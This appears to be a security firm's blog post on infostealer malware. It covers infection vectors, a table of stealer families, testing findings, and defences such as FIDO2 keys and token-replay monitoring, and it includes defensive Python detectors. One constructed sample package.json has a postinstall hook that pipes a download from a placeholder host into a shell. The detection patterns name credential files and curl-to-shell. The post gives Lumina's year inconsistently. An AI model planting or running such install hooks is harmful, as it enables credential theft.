
The Silent Heist: Understanding and Defending Against Infostealer Malware

The modern threat landscape has shifted from simple data theft to a sophisticated “Log-as-a-Service” economy, where the primary objective is the total compromise of digital identity. Infostealers are no longer just tools for harvesting passwords; they are the initial engines of access that fuel a significant portion of modern breaches[16]. By extracting session tokens, these malware strains allow attackers to “log in” as a legitimate user, bypassing Multi-Factor Authentication (MFA) and making traditional perimeter defenses irrelevant in many cases.

Infection Vectors and Global Campaigns: The Entry Point

The question of how these malware strains defeat hardened organisational defenses often boils down to a single high-value workstation or a moment of misplaced trust. A primary vector is the “Trusted Contractor” Loophole, as seen in the Okta breach by Lapsus$ [13], where a support engineer’s personal device was compromised by an infostealer. Another surging tactic is Malvertising and SEO Poisoning, which saw a massive increase through 2025 via techniques like ClickFix [14]. In these cases, employees searching for tools like “AnyDesk” click on sponsored Google Ads leading to cloned sites. These deliver “poisoned” installers that side-load malicious DLLs directly into memory, evading signature-based antivirus. And more recently, the “Developer Recruitment” Scam has targeted technical staff on LinkedIn, where attackers posing as recruiters send “technical assessments” in password-protected archives. When a developer runs a simple command—like npm install—a malicious one-liner executes, immediately scraping .aws/credentials and SSH keys to provide the attacker with instant “living off the land” capabilities.
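As an added example (not code from the post or from KMSEC), the pre-install check a developer or CI step can run on an archive received as a “technical assessment”: it lists the lifecycle hooks that npm would execute and flags any that pull remote code or touch credential files. The detection heuristics, the placeholder host and the sample package.json are all constructed for illustration.

```python
"""Audit a package.json for install-time lifecycle scripts before `npm install`.

Added example, not code from the original post. npm runs the preinstall,
install, postinstall and prepare hooks automatically, so a lure package sent as
a "technical assessment" needs no further action from the developer. Heuristics
and the sample package.json below are constructed for illustration.
"""
import json
import re

# Hooks that `npm install` runs without prompting.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Assumed indicators worth a manual look; not an exhaustive list.
SUSPICIOUS = (
    (r"\.aws/credentials|\.ssh/", "touches credential material in the home directory"),
    (r"(curl|wget)\s.*\|\s*(ba)?sh\b", "pipes a remote download into a shell"),
    (r"base64\s+(-d|--decode)", "decodes an embedded base64 payload"),
    (r"\beval\b|\bnode\s+-e\b", "evaluates inline code"),
)

def audit_package_json(text):
    """Return (hook, reason, command) findings for one package.json document."""
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        reasons = [reason for pattern, reason in SUSPICIOUS if re.search(pattern, cmd)]
        # Every install-time hook is reported, even one that looks benign.
        for reason in reasons or ["runs automatically on install"]:
            findings.append((hook, reason, cmd))
    return findings

# Constructed lure: a normal build script, a common benign hook, and a postinstall
# hook that downloads and executes remote code from a placeholder host.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "assessment-task",
    "scripts": {
        "build": "tsc -p .",
        "prepare": "husky install",
        "postinstall": "curl -s https://example.invalid/setup.sh | sh",
    },
})

if __name__ == "__main__":
    for hook, reason, cmd in audit_package_json(SAMPLE_PACKAGE_JSON):
        print(f"[{hook}] {reason}: {cmd}")
```

Running `npm install --ignore-scripts` installs the dependency tree without executing these hooks, so the archive can be inspected before anything in it runs.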

The Evolution of the Infostealer: 2022–2026

The “New Guard” of infostealers focuses on advanced anti-analysis techniques and platform-agnostic distribution, building on the prolific variants of the early 2020s. Early foundational threats like LokiBot (2022) and RedLine (2022), monitored by Check Point and KPMG respectively, established the “Stealer-as-a-Service” (SaaS) model by targeting browser stores and NFT bots to fuel credential-stuffing markets [1][7]. By 2023, Agent Tesla and Vidar introduced more sophisticated propagation, with Fortinet observing Agent Tesla’s use of process hollowing to exfiltrate data via SMTP, effectively acting as a precursor for targeted corporate espionage [6][2].

The transition into the “Log-as-a-Service” (LaaS) era is epitomized by DarkGate (2024) and the pervasive Lumina (2026). DarkGate was identified by Critical Start spreading through Microsoft Teams, while Darktrace has highlighted Lumina’s novel “bit-flipping” techniques to bypass EDR and hijack MFA-protected session tokens [3][4]. Contemporary threats like Katz (2025) and AURA (2025), discovered by Flashpoint, now specifically target Linux environments and app-bound encryption, shifting the impact from isolated login events to persistent, cross-platform infrastructure compromise [5].

| Common Name | Year | Operating System | Targets / Capabilities | Source |
|---|---|---|---|---|
| Lumina (LummaC2) | 2023 | Windows | Uses “bit-flipping” to bypass EDR and steals session tokens to bypass MFA. | [4] |
| Katz | 2025 | Windows, Linux | Targets Chromium browsers; specifically searches for crypto wallets and browser credentials. | [5] |
| AURA | 2025 | Windows | App-bound encryption bypass; features Telegram bot integration and “FileGrabber” config. | [5] |
| DarkGate | 2024 | Windows | Multi-functional loader using AutoIt scripts; distributed via Microsoft Teams phishing. | [3] |
| Vidar | 2023 | Windows | Brandjacking specialist; used fake AnyDesk domains to steal banking and 2FA data. | [2] |
| Agent Tesla | 2023 | Windows | Advanced RAT using process hollowing; exfiltrates data via SMTP to attacker mail servers. | [6] |
| RedLine | 2022 | Windows | The “standard” for MaaS; spread via fake Windows 11 installers and Binance NFT bots. | [7] |
| LokiBot | 2022 | Win / Android | Modular stealer focusing on Android banking credentials and Windows browser stores. | [1] |

Vulnerabilities Frequently Seen in KMSEC Testing

In our offensive security assessments, KMSEC frequently identifies critical vectors that remain undefended even in “mature” environments:

  • Web Portal Uploads and Staging: Organizations often assume that image formats or PDFs are inherently innocent. However, we consistently find that web servers (Apache/Nginx) are neglected as potential staging platforms for storing and propagating malware, especially given the lax scrutiny that web uploads tend to receive. Beyond the technical risk, there is a severe legal risk: an open upload server can be used to host illegal material, embroiling the organization in criminal investigations. To remediate this, organizations should enforce a blend of the following: (i) automated scanning of all uploads, (ii) strict limits on upload functionality to specific file types, and (iii) frequent inspection and purging of upload storage.

  • Mobile Broadcast and Path Trust: In our mobile testing, we find that applications often trust the source of broadcasts too readily and place excessive trust in file path names. This leads to vectors where an attacker-controlled app can send a malicious intent to a privileged app, forcing it to perform unauthorized actions or leak sensitive data.

  • Developer Machine Vulnerability: With the surge in targeted developer attacks, we have observed that hacking a single developer machine is far easier and more lucrative than attacking a hardened frontend server. Developers often hold the “keys to the kingdom”—2FA recovery codes and authentication material—which are primary targets for modern infostealers.
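The upload-staging finding above calls for rejecting files by what they contain rather than what they claim to be. As an added example (not KMSEC’s code), the gate below enforces a file-type allow-list by magic bytes, refuses stacked extensions and rejects image bodies carrying a server-side script marker; the allow-list, marker list and sample files are constructed, and the automated scanning the finding recommends would still run on anything that passes.

```python
"""Validate an upload by its bytes, not its filename or Content-Type.

Added example, not code from the original post. Filename and declared MIME type
are attacker-controlled; magic bytes are not. This enforces an allow-list, checks
leading bytes against the claimed type, refuses stacked extensions and rejects
bodies carrying a server-side script marker. Samples below are constructed.
"""
import os

# Allow-list of extensions and the magic-byte prefixes each may start with.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".pdf": (b"%PDF-",),
}
# Markers with no legitimate place inside an image or PDF body (assumed list).
SCRIPT_MARKERS = (b"<?php", b"<script", b"#!/bin/")

def validate_upload(filename, data, max_bytes=5 * 1024 * 1024):
    """Return (accepted, reason); the first failing check decides the verdict."""
    stem, ext = os.path.splitext(filename)
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, "extension not in allow-list"
    if "." in stem:
        # "report.php.png" passes the allow-list, but a server that dispatches on
        # the first extension would still execute it.
        return False, "stacked extensions"
    if len(data) > max_bytes:
        return False, "exceeds size limit"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "magic bytes do not match declared type"
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        return False, "script marker embedded in file body"
    return True, "ok"

# Constructed samples: a valid PNG, a polyglot PNG with PHP appended, a PDF that
# is really a GIF, a stacked extension, and a plain script file.
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLES = {
    "photo.png": PNG_HEADER,
    "avatar.png": PNG_HEADER + b"<?php /* constructed marker */ ?>",
    "cv.pdf": b"GIF89a" + b"\x00" * 16,
    "report.php.png": PNG_HEADER,
    "tool.php": b"<?php",
}
```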

Figure 1: Infographic showing popular infostealer malware attack vectors and modus operandi

The Ripple Effect: Beyond the Initial Event

The impact of an infostealer is rarely a one-time event. Once a developer machine or a personal device is compromised, it opens up a permanent backdoor into the infrastructure. These breaches often “haunt” an organization months later; even after a password is changed, the harvested session tokens or AWS keys might still be valid, allowing for persistent, quiet exfiltration of source code and proprietary data. The compromise of a personal machine used for remote work can bypass the most expensive corporate firewalls, as the “infection” is carried directly into the authenticated session.

Organizations must move beyond simple password resets to survive. (1) Many firms now implement Continuous Access Evaluation (CAE), which terminates active sessions if a device’s security posture changes—such as when an EDR is disabled [8]. (2) Transitioning to FIDO2/WebAuthn hardware keys is critical, as these are cryptographically bound to specific domains, making phished credentials useless [10]. (3) Organizations are also adopting Identity Threat Detection and Response (ITDR) to monitor for suspicious token reuse from unauthorized IP addresses.
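The ITDR monitoring in point (3) reduces to a correlation over authentication logs. As an added example (not code from the post or any product named in it), the rule below binds each session to the IP and client that obtained it at login and alerts when the same session token is later used from outside trusted ranges or by a different client; the trusted ranges and the log lines are constructed.

```python
"""Flag session-token replay from an unexpected network or client.

Added example, not code from the original post: the kind of rule an ITDR tool
or SIEM correlation runs over authentication logs. A session is bound at login
to the IP and User-Agent that obtained it; later use of that session from outside
trusted ranges, or by a different client, suggests a stolen token being replayed.
"""
import ipaddress
import json

# Assumed corporate egress and VPN ranges (constructed, documentation prefixes).
TRUSTED_NETS = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "10.8.0.0/16")]

def is_trusted(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)

def detect_token_replay(log_lines):
    """Return alerts as (session, user, reason, ts) for suspicious session use."""
    bound = {}      # session id -> (ip, user agent) recorded at login
    alerts = []
    for line in log_lines:
        ev = json.loads(line)
        sid = ev["session"]
        if ev["event"] == "login":
            bound[sid] = (ev["ip"], ev["ua"])
            continue
        if sid not in bound:
            # No login in the window: e.g. a long-lived cookie that survived a password reset.
            alerts.append((sid, ev["user"], "token used without observed login", ev["ts"]))
            continue
        ip0, ua0 = bound[sid]
        if ev["ip"] != ip0 and not is_trusted(ev["ip"]):
            alerts.append((sid, ev["user"], f"replayed from untrusted IP {ev['ip']}", ev["ts"]))
        elif ev["ua"] != ua0:
            alerts.append((sid, ev["user"], "client changed mid-session", ev["ts"]))
    return alerts

# Constructed log: dev1 logs in from the office, moves to the VPN range (allowed), then
# the same session is used from an unknown network by a script; dev2's session has no login.
SAMPLE_LOG = [
    '{"ts":"2026-04-03T08:01:00Z","event":"login","session":"s1","user":"dev1","ip":"203.0.113.45","ua":"Chrome/124"}',
    '{"ts":"2026-04-03T08:05:00Z","event":"api","session":"s1","user":"dev1","ip":"203.0.113.45","ua":"Chrome/124"}',
    '{"ts":"2026-04-03T08:40:00Z","event":"api","session":"s1","user":"dev1","ip":"10.8.12.3","ua":"Chrome/124"}',
    '{"ts":"2026-04-03T09:30:00Z","event":"api","session":"s1","user":"dev1","ip":"198.51.100.7","ua":"python-requests/2.31"}',
    '{"ts":"2026-04-03T10:00:00Z","event":"api","session":"s9","user":"dev2","ip":"203.0.113.9","ua":"Chrome/124"}',
]

if __name__ == "__main__":
    for sid, user, reason, ts in detect_token_replay(SAMPLE_LOG):
        print(f"{ts} {user} session={sid}: {reason}")
```

The response to either alert is to revoke the session server-side; resetting the password alone leaves the harvested token valid, which is the point made above.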

KMSEC helps bridge these gaps through Security Awareness Assessments that test employees against the exact lures used by groups like Lumma. Our Manual Penetration Testing identifies the over-scoped IAM roles and “hidden doors” that allow an attacker to move laterally after an initial compromise. By closing these pathways, KMSEC ensures that an infostealer infection remains a contained incident rather than a catastrophic corporate breach.


References

  1. Check Point (2022) LokiBot Malware. Available at: https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/lokibot-malware/ (Accessed: 3 April 2026).
  2. Check Point (2023) What is Vidar Malware? Available at: https://www.checkpoint.com/press-releases/january-2023s-most-wanted-malware/ (Accessed: 3 April 2026).
  3. Critical Start (2024) DarkGate Malware Campaign. Available at: https://www.criticalstart.com/resource/darkgate-malware-campaign/ (Accessed: 3 April 2026).
  4. Darktrace (2026) The Rise of MaaS & Lumma Info Stealer. Available at: https://darktrace.com/blog/rise-of-maas-lumma (Accessed: 3 April 2026).
  5. Flashpoint (2025) Infostealers to Watch in 2025: Katz, Bee, Acreed, and More. Available at: https://flashpoint.io/blog/infostealers-to-watch-2025/ (Accessed: 3 April 2026).
  6. Fortinet (2023) Unmasking Agent Tesla. Available at: https://www.fortinet.com/blog/threat-research/unmasking-agent-tesla (Accessed: 3 April 2026).
  7. KPMG (2022) RedLine Stealer: A Growing Threat. Available at: https://assets.kpmg.com/content/dam/kpmg/in/pdf/2022/09/redline-stealer.pdf (Accessed: 3 April 2026).
  8. Palo Alto Networks Unit 42 (2026) 2026 Global Incident Response Report. Available at: https://unit42.paloaltonetworks.com/ (Accessed: 3 April 2026).
  9. Pen Test Partners (2025) 2025, the year of the Infostealer. Available at: https://www.pentestpartners.com/security-blog/ (Accessed: 3 April 2026).
  10. SpyCloud (2025) 2025 SpyCloud Identity Threat Report. Available at: https://spycloud.com/resource/2025-identity-threat-report/ (Accessed: 3 April 2026).
  11. Vectra AI (2025) Infostealers stole 1.8B credentials in 2025: How to defeat them. Available at: https://www.vectra.ai/blog/infostealers-2025-report (Accessed: 3 April 2026).
  12. Microsoft (2022) DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Available at: https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ (Accessed: 3 April 2026).
  13. Okta (2026) Updated Okta Statement on LAPSUS$. Available at: https://www.okta.com/blog/company-and-culture/updated-okta-statement-on-lapsus/ (Accessed: 3 April 2026).
  14. Microsoft (2025) Think before you Click(Fix): Analyzing the ClickFix social engineering technique. Available at: https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/ (Accessed: 6 April 2026).
  15. Anatomy of a Developer Recruitment Scam: A Technical Forensic Analysis. Available at: https://www.alexpruteanu.cloud/blog/anatomy-of-a-developer-recruitment-scam
  16. Sheppard, B. (2025) The Growth of Infostealer Usage: A Case Study of Lumma Stealer. Available at: https://www.researchgate.net/profile/Ben-Sheppard-8/publication/398429801_The_Growth_of_Infostealer_Usage_-_A_Case_Study_of_Lumma_Stealer/links/693622a70c98040d481be5f5/The-Growth-of-Infostealer-Usage-A-Case-Study-of-Lumma-Stealer.pdf (Accessed: 6 April 2026).

Keith is the founder of KMSecurity (Pty) Ltd. and a passionate security researcher with a storied career of helping clients all over the world become aware of information security risks. Keith has worked for clients in Europe, the Americas and Asia, and in that time has gained experience assessing clients from a plethora of industries and technologies. Keith’s experience renders him ready to tackle any application, network or organisation his clients need help with, and he is always eager to learn new environments. As a security researcher Keith has uncovered bugs in some prominent applications and services, including the Google Chrome browser, various Google services and components of the Mozilla web browser.
